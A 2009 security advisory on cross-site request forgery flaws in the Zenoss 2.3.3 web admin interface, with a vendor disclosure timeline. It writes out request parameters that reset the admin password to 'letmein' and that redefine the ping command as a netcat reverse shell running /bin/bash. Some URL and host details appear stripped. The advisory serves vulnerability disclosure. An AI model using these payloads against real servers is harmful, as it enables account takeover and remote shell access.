nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF Application: Zenoss 2.3.3 Vendor: Zenoss Vendor website: Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx) I. BACKGROUND Zenoss is a commercial and open source systems and network monitoring tool. Much of the applications functionality is accessible via a front end web application. II. DETAILS Multiple CSRF vulnerabilities exist that can allow for arbitrary commands to be executed on the Zenoss server as well as reset the Zenoss admin password. Attack scenario: If an administrator has an active Zenoss session and visits one of these links or visits a malicious page that contains resources to point to these URL's 1. Reset user password to a known state Cross-Site Request Forgery CSRF, in this case the password is reset to letmein. defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings 2. Change and execute a command CSRF. Change the ping command to be a netcat shell out to a remote system. In this case an internal system running on port 443 -e /bin/bash 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail Execute the new "ping" command: III. REFERENCES [1] - IV. VENDOR COMMUNICATION 3.10.2009 - Vulnerability Discovery 8.21.2009 - Requested status from vendor 9.29.2009 - Vendor call (Fix pending) Copyright (c) 2009 nGenuity Information Services, LLC